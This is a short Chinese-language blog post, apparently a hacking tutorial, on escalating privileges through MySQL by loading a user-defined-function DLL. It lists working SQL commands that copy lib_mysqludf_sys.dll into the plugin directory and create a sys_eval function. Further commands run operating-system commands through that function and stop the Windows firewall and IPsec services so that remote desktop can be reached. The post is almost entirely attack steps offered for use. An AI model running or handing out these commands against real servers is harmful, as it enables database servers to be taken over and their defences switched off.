SqlMap之mysql udf.dll 提權

先上傳dll文件到任意目錄,如:D:/RECYCLER/lib_mysqludf_sys.dll 

導入dll,根據版本導入到windows或mysql 插件目錄(一般執行select @@plugin_dir 可看到插件目錄具體路徑):
select load_file(‘D:/RECYCLER/lib_mysqludf_sys.dll’) into dumpfile’c:/windows/lib_mysqludf_sys.dll’ (高版本需要導入上面查詢到的插件目錄)

創建function:
create function sys_eval returns string soname ‘lib_mysqludf_sys.dll’;

執行命令:
select sys_eval(‘whoami’);

一般情況下不會出現創建不成功哦。

連不上3389可以先停止windows防火牆和篩選

select sys_eval(‘net stop policyagent’);
select sys_eval(‘net stop sharedaccess’);


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章